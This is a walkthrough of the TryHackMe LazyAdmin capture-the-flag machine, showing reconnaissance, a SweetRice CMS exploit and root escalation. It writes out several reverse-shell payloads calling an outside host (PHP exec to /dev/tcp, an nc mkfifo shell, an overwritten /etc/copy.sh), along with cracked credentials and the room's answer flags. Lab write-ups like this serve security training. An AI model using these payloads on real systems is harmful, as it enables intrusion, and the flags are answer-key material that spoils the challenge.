Understanding the CTF TryHackMe LazyAdmin Challenge

The LazyAdmin challenge on TryHackMe is an easy-level Linux machine designed to sharpen your cybersecurity skills through hands-on exploitation. This challenge demonstrates how misconfigurations and outdated software can lead to full system compromise, offering multiple attack vectors to gain both user and root access.

Key Points

• Reconnaissance: Gather information about the target system.
• Vulnerability Identification: Identify and exploit weaknesses in web applications and system scripts.
• Privilege Escalation: Escalate from user to root access by exploiting misconfigurations.

Initial Reconnaissance

Start by gathering information about the target system.

Nmap Scan

Run a basic scan to identify open ports and services:

nmap -sC -sV 10.10.105.71

Results:

Port	Service	Version
22	SSH	OpenSSH 7.2p2
80	HTTP	Apache httpd 2.4

Note: Port 80 hosts a web server, while SSH (port 22) may be useful later for remote access.

Web Enumeration

• The web server runs Apache2 on Ubuntu.
• Use gobuster to discover hidden directories:

  gobuster dir -u http://10.10.105.71 -w /usr/share/wordlists/dirb/common.txt
  

• Key Finding: The /content directory reveals the SweetRice Basic-CMS installation.

Exploiting SweetRice CMS

The CMS has known vulnerabilities that allow remote code execution (RCE).

Finding the Exploit

Search for exploits using searchsploit:

searchsploit sweetrice

Download the relevant exploit:

searchsploit -m exploits/php/webapps/40700.html

Modification Required: Replace the attacker’s IP in the exploit script with your own.

Extracting Admin Credentials

1. Use the mysql_backup exploit to download the SQL dump:

   curl http://10.10.105.71/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
   

2. Analyze the dump for credentials:

   "admin\";s:7:\"manager\";s:6:\"passwd\";s:32:\"42f749ade7f9e195bf475f37a44cafcb\";
   

3. Crack the MD5 hash (e.g., using CrackStation):
   • Plaintext Password: Password123

Gaining a Reverse Shell

1. Log in to the CMS admin panel (/content/as) with:
   • Username: manager
   • Password: Password123
2. Navigate to Ads > PHP Code Execution and inject a reverse shell payload:

   <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
   

3. Start a listener on your machine:

   nc -lvnp 4444
   

4. Reload the page to receive the shell.

Alternative Tools: Use HackTools or PentestMonkey’s reverse shell cheat sheet for payloads.

Privilege Escalation

After gaining user access, escalate to root by exploiting a misconfigured backup script.

Identifying the Vulnerability

1. Locate the backup.pl script in /usr/local/bin:

   cat /usr/local/bin/backup.pl
   

   Content:

   #!/usr/bin/perl
   system("sh", "/etc/copy.sh");
   

2. Inspect /etc/copy.sh:

   cat /etc/copy.sh
   

   Content:

   rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
   

Exploiting the Script

1. Overwrite /etc/copy.sh with a reverse shell payload:

   echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > /etc/copy.sh
   

2. Start a listener on port 5555:

   nc -lvnp 5555
   

3. Wait for the backup.pl script to execute (or trigger it manually).

Flags

Flag Type	Value
User	THM{63e5bce9271952aad1113b6f1ac28a07}
Root	THM{6637f41d0177b6f37cb20d775124699f}

Key Takeaways

• Reconnaissance is critical: Always scan for open ports and hidden directories.
• Exploit chaining: Combine multiple vulnerabilities (e.g., CMS flaws + script misconfigurations) for full compromise.
• Hash cracking: Tools like CrackStation can quickly decrypt weak hashes.
• Privilege escalation: Check for writable scripts or cron jobs running as root.

Common Pitfalls & Tips

• Failed reverse shell? Verify your IP/port and firewall rules.
• Permission denied? Ensure the target script is writable (chmod +x if needed).
• Stuck? Re-examine the nmap results for overlooked services.

Learn More

• TryHackMe LazyAdmin Room
• SweetRice Exploit-DB Entry
• Reverse Shell Cheat Sheet